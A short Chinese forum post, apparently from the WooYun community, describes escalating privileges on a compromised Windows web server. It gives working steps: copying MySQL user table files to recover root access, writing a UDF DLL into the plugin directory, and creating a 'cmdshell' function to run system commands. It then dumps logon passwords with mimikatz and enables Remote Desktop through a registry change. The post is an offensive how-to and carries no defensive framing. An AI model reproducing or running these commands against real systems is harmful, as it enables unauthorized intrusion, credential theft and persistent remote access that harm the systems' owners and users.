|
今天看老大提权,在一旁偷学了几招,闲着无聊分享给大家,希望能喜欢。
aspx+mssql+2008 不是sa用户
[/url]
看到3306端口,尝试udf提权
翻了翻网站目录没有找到root用户
然后发现这个目录有读的权限,于是下载user.frm .user.MYD user.MYI 到本地
[url=http://static.wooyun.org/upload/image/201606/2016060120422885328.png]
放到test数据库里进行查询
[/url]
[url=http://static.wooyun.org/upload/image/201606/2016060120460919980.png]
这时候蛋疼的事情发生了,php脚本一旦出现 phpinfo() eval() mysql_connect()等这类敏感函数,服务器就会返回500,又不能外联,弹了shell回来和本地交互也不能进入到mysql,aspx连接mysql提示未安装什么模块。
老大就是老大姿势要多YD有多YD,通过mysql-e参数 在cmd下执行数据库语句。
[/url]
上传可爱的udf,因为权限不够所以需要通过mysql导出到\lib\plugin 这个目录下
[url=http://static.wooyun.org/upload/image/201606/2016060121082813985.png]
[/url]
创建函数
- create function cmdshell returns string soname 'udf.dll';
复制代码 执行命令
select cmdshell('whoami');
[url=http://static.wooyun.org/upload/image/201606/2016060121122220704.png]
下面就不截图了 体力活!!!
然后就是上传神器mimikatz抓取hash
- mimikatz privilege::debug sekurlsa::logonpasswords
复制代码 查看远程桌面端口
- reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\Tcp" /v PortNumber
复制代码 没有打开的话可以通过注册表打开3389
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
复制代码
|
|